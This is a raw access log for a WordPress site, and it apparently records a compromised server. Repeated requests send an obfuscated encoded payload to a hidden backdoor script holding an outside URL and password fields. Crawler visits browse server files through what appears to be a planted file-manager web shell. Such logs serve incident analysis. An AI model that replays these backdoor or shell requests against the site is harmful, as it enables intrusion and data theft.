107.191.43.201 - - [14/May/2026:07:51:10 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736333037302p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393437302q3965386463636339366263396465653236663937333431656537643762356163222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.37 - - [14/May/2026:07:56:17 -0400] "GET /p/ball%2022131825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Ferror_docs%2Fnot_implemented.html&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Ferror_docs HTTP/1.0" 200 7056 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [14/May/2026:07:56:17 -0400] "GET /?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/core/kits/documents/tabs HTTP/1.0" 200 7578 "https://ascensionfitnessusa.naluendorse.com/?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/core/kits/documents/tabs/settings-custom-css.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/core/kits/documents/tabs" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
107.191.43.201 - - [14/May/2026:07:52:05 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736333132352p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393532352q3636393632386138366465396561633036396464383062313762373162323963222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.37 - - [14/May/2026:07:56:47 -0400] "GET /p/ball%2022031825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fincludes%2Fscreen.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fincludes HTTP/1.0" 200 8328 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.37 - - [14/May/2026:07:57:17 -0400] "GET /p/bale%2010587824?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Flogs%2Faccess_ssl_log.processed.5.gz&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Flogs HTTP/1.0" 200 6622 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [14/May/2026:07:57:19 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/blocks/accordion-panel/.htaccess&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/blocks/accordion-panel HTTP/1.0" 200 6746 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/blocks/accordion-panel" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
107.191.43.201 - - [14/May/2026:07:52:25 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736333134352p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393534352q3131643265666562353236366362623064376233616332636438393939373763222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.37 - - [14/May/2026:07:57:38 -0400] "GET /p/beef%2032291826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Ftheme.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 37621 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [14/May/2026:07:52:45 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736333136352p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393536352q3064666461366639353539306531383239353363653465353764363838633163222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
107.191.43.201 - - [14/May/2026:07:53:05 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736333138352p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393538352q3337333362643534643934326236306132616232353064316461623931663838222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.37 - - [14/May/2026:07:58:10 -0400] "GET /p/beef%2030695826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fmedia-template.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 12185 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [14/May/2026:07:58:22 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/blocks/accordion-panel/block.json&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/blocks/accordion-panel HTTP/1.0" 200 7224 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/blocks/accordion-panel" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.37 - - [14/May/2026:07:58:23 -0400] "GET /p/beef%2030163826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fcss%2Fsite-health-rtl.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fcss HTTP/1.0" 200 8091 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [14/May/2026:07:53:25 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736333230352p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393630352q6538323363656537383465393064316233303137353531343264316634373366222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
107.191.43.201 - - [14/May/2026:07:53:45 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736333232352p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393632352q3163373535613739393536326636353331616239363833643966323632666537222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.37 - - [14/May/2026:07:58:54 -0400] "GET /p/beef%2030767826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fcss%2Fcolors%2Flight%2Fcolors.scss&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fcss%2Fcolors%2Flight HTTP/1.0" 200 7010 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [14/May/2026:07:54:05 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736333234352p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393634352q6265326163653838343363663561636331623430663631663961653931363666222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
74.7.227.20 - - [14/May/2026:07:59:20 -0400] "GET /?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/core/kits/documents HTTP/1.0" 200 7082 "https://ascensionfitnessusa.naluendorse.com/?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/core/kits/documents/tabs/settings-custom-css.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/core/kits/documents/tabs" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.37 - - [14/May/2026:07:59:25 -0400] "GET /p/atom%2021795817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fimages%2Fimgedit-icons.png&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fimages HTTP/1.0" 200 6642 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [14/May/2026:07:54:25 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736333236352p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393636352q6639623864363531663833376533346434636636356461303137633739336366222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
107.191.43.201 - - [14/May/2026:07:56:06 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736333336362p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393736362q6236313066666563393531323963643536333336646661656531633461313162222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.37 - - [14/May/2026:07:59:56 -0400] "GET /p/ball%2021235825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fupload.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin HTTP/1.0" 200 10689 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [14/May/2026:08:00:11 -0400] "GET /?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/core HTTP/1.0" 200 7921 "https://ascensionfitnessusa.naluendorse.com/?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/core/kits/documents/tabs/settings-custom-css.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/core/kits/documents/tabs" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.37 - - [14/May/2026:08:00:26 -0400] "GET /p/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fimages%2Fimages%2Fimages%2FshlaAyNtjLHV.tiff&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fimages%2Fimages%2Fimages HTTP/1.0" 200 9049 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.37 - - [14/May/2026:08:00:48 -0400] "GET /p/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fimages%2Fimages%2Ff4v_69c64821d953a.zip&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fimages%2Fimages HTTP/1.0" 200 6641 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [14/May/2026:08:00:55 -0400] "GET /?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/modules/global-classes/usage HTTP/1.0" 200 7155 "https://ascensionfitnessusa.naluendorse.com/?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/modules/global-classes/usage/css-class-usage.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/modules/global-classes/usage" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.37 - - [14/May/2026:08:01:21 -0400] "GET /p/beef%2032911826?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-content%2Fplugins%2Fduplicator%2Flib HTTP/1.0" 200 7065 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [14/May/2026:07:56:31 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736333339312p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393739312q6361313662336263636538396539656339643535376539303232663535626561222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.37 - - [14/May/2026:08:01:34 -0400] "GET /p/atom%2021795817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fcss%2Fwidgets.css&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fcss HTTP/1.0" 200 10431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.37 - - [14/May/2026:08:01:42 -0400] "GET /p/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fjs%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fjs HTTP/1.0" 200 6729 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [14/May/2026:07:57:46 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736333436362p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393836362q3834343566353339656464353161323832333761643636633564633534646339222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
107.191.43.201 - - [14/May/2026:07:57:26 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736333434362p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393834362q3438653061336135373937626536343334373036396561333131366131616536222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
74.7.227.20 - - [14/May/2026:08:01:55 -0400] "GET /?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/modules/global-classes HTTP/1.0" 200 7507 "https://ascensionfitnessusa.naluendorse.com/?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/modules/global-classes/usage/css-class-usage.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/modules/global-classes/usage" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.37 - - [14/May/2026:08:01:55 -0400] "GET /p/atom%2021391817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fjs%2Fwp-auth-check.js&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fjs HTTP/1.0" 200 8181 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.37 - - [14/May/2026:08:02:10 -0400] "GET /p/atom%2021795817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fabilities.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 8410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.37 - - [14/May/2026:08:02:22 -0400] "GET /p/beef%2030163826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2F.myimunify_id&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com HTTP/1.0" 200 6680 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.37 - - [14/May/2026:08:02:53 -0400] "GET /p/bale%2012575824?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Faudio%2Ftheme.css&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Faudio HTTP/1.0" 200 6722 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [14/May/2026:08:03:01 -0400] "GET /?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/woocommerce/assets/client/admin/embed HTTP/1.0" 200 7252 "https://ascensionfitnessusa.naluendorse.com/?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/woocommerce/assets/client/admin/embed/style.css&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/woocommerce/assets/client/admin/embed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.37 - - [14/May/2026:08:03:07 -0400] "GET /p/beef%2030163826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fcss%2Finstall.css&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fcss HTTP/1.0" 200 8442 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.37 - - [14/May/2026:08:03:20 -0400] "GET /p/bale%2012575824?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-content%2Fuploads%2Fwc-logs%2Findex.html&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-content%2Fuploads%2Fwc-logs HTTP/1.0" 200 6649 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [14/May/2026:07:58:06 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736333438362p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393838362q3566346463656633366561613537643732623664353635336438353164363330222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.37 - - [14/May/2026:08:03:34 -0400] "GET /p/ball%2022151825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Frobots.txt&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs HTTP/1.0" 200 6681 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [14/May/2026:07:58:26 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736333530362p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393930362q3835656235323865616138363136656265653938323466323938653333383261222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
